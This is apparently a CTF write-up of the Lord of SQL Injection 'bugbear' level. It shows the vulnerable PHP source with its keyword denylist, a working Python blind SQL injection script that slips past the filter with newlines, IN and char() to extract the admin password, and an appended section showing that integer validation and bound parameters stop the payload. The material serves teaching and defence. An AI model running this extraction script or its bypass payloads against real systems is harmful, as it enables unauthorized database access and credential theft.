WebHacking/Load Of Sql Injection
LOS bugbear
HSr00t
2018. 2. 15. 04:14
```php
<?php
  include "./config.php";
  login_chk();
  dbconnect();
  // Blacklist filters on the `no` parameter (keyword/character denylist, case-insensitive).
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
  if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");
  // `no` is interpolated unquoted into the query string.
  $query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysql_fetch_array(mysql_query($query));
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysql_fetch_array(mysql_query($query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
  highlight_file(__FILE__);
?>
```
In this challenge, 0x (used for hex literals) and like are blocked.
While searching the syntax for something that could replace like, I figured IN would work, so I solved the challenge with IN.
Because ' is blocked, I used char() to build string literals.
```python
import urllib2

input_ = 33    # first printable ASCII code to try for the current character
passwd = ''
num = 8        # left(right(pw, num), 1) is character (9 - num) of the 8-character pw,
               # so the password is recovered left to right as num counts down

while(True):
    # %0a (newline) stands in for the blocked space; IN(char(...)) replaces the blocked = and like
    url = 'https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?no=0%0a||%0aid%0aIN(char(97,100,109,105,110))%0a%26%26%0a'
    url += 'left(right(pw,%d)' %(num)
    url += ',1)%0aIN'
    url += '(char(%d))' %(input_)
    print url
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0')
    req.add_header('cookie','PHPSESSID=p1fad2hverso8kg1fs3fndoof6')
    data = urllib2.urlopen(req).read()
    if '<h2>Hello admin</h2>' in data:
        print 'Search %s' %(chr(input_))
        passwd += chr(input_)
        input_ = 33
        num -= 1
        if len(passwd) == 8:
            break
    else:
        print chr(input_)+'failed'
        input_ += 1

print 'Key is '+passwd
```
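To show why the challenge's denylist is not a fix, the following added example (mine, not part of the write-up or the LOS source) transcribes the two preg_match gates on `no` into Python, checks the URL-decoded `no` value the script above sends against them and against a positive integer check, and then runs the same query with bound parameters against a constructed in-memory SQLite table; the table rows and the admin password value are placeholders I made up.

```python
import re
import sqlite3

# The `no` value in the shape the write-up's script sends (URL-decoded); newlines replace the blocked space.
PAGE_PAYLOAD_NO = "0\n||\nid\nIN(char(97,100,109,105,110))\n&&\nleft(right(pw,8),1)\nIN(char(33))"

# Both preg_match gates on `no` from the challenge source, merged into one case-insensitive pattern.
NO_BLACKLIST = re.compile(r"prob|_|\.|\(\)|'|substr|ascii|=|or|and| |like|0x", re.I)


def blacklist_allows(no):
    """True when the challenge's denylist would let `no` through to string concatenation."""
    return NO_BLACKLIST.search(no) is None


def whitelist_allows(no):
    """Positive validation: `no` is a numeric column, so accept only an unsigned decimal integer."""
    return re.fullmatch(r"[0-9]{1,10}", no) is not None


def make_db():
    """Constructed in-memory stand-in for prob_bugbear (assumption: rows and values are placeholders)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table prob_bugbear(id text, pw text, no integer)")
    conn.executemany("insert into prob_bugbear values (?, ?, ?)",
                     [("guest", "guest", 1), ("admin", "PLACEHOLDER_PW", 2)])
    return conn


def query_guest_id(conn, pw, no):
    """Same query as the challenge, but both inputs are bound parameters, never interpolated."""
    row = conn.execute(
        "select id from prob_bugbear where id='guest' and pw=? and no=?", (pw, no)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print("denylist lets payload through:", blacklist_allows(PAGE_PAYLOAD_NO))   # True
    print("integer check lets payload through:", whitelist_allows(PAGE_PAYLOAD_NO))   # False
    conn = make_db()
    print("bound query, honest input:", query_guest_id(conn, "guest", "1"))   # guest
    print("bound query, payload as no:", query_guest_id(conn, "guest", PAGE_PAYLOAD_NO))   # None
```

With parameters bound, the whole payload is compared as a single value against the integer column and simply never matches, regardless of which keywords the filter happens to list.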